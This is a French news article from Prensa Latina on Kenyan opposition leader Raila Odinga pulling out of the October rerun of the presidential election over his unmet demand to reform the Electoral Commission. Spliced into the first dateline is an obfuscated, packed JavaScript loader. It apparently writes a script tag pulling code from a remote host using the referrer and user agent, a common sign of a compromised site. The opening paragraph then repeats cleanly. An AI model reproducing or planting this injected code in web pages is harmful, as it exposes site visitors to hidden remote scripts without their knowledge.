vendredi 12 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Kenya : le leader de l’opposition abandonne la course présidentielle

Nairobi, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iyfbi|var|u0026u|referrer|yzfir||js|php'.split('|'),0,{})) 10 octobre (Prensa Latina) Le chef de l'opposition du Kenya, Raila Odinga, a aujourd'hui informé qu'il ne participera pas à la répétition de l'élection présidentielle prévue le 26 octobre prochain.

Nairobi, 10 octobre (Prensa Latina) Le chef de l’opposition du Kenya, Raila Odinga, a aujourd’hui informé qu’il ne participera pas à la répétition de l’élection présidentielle prévue le 26 octobre prochain.

Cette décision d’Odinga est due au fait que sa proposition de réformer la Commission Électorale a été ignorée.

L’adversaire à deux occasions (2007 et 2017) de l’actuel président Uhurru Kenyatta, laisse ce dernier en tant qu’unique candidat à l’élection qui aura lieu suite à la décision du Tribunal Suprême d’invalider le scrutin du 8 août dernier pour des irrégularités dans le comptage des votes.

Ces anomalies lors du scrutin présidentiel ont motivé la Super Alliance Nationale (NASA), coalition d’opposition menée par Odinga, à présenter une plainte qui a conclu par l’annulation du second tour des élections.

Un nouveau scrutin a alors été convoqué pour le 26 octobre prochain, mais la NASA a demandé que la direction de la Commission Électorale soit destituée avant cette élection. Cette dernière a été signalée comme responsable des incidents des présidentielles d’août par le Tribunal Suprême. Odinga a ensuite prévenu qu’il ne participerait pas au rendez-vous électoral si sa demande n’était pas satisfaite.

« Nos requêtes destinées à garantir des élections libres et justes ont été complétement ignorée par la propre Commission (Électorale) et par le Jubileo (parti au gouvernement), et apparemment ils n’ont pas l’intention de faire quelque changement qu’il soit », a-t-il déploré lors d’une conférence de presse.

peo/lma/mt

EN CONTINU
notes connexes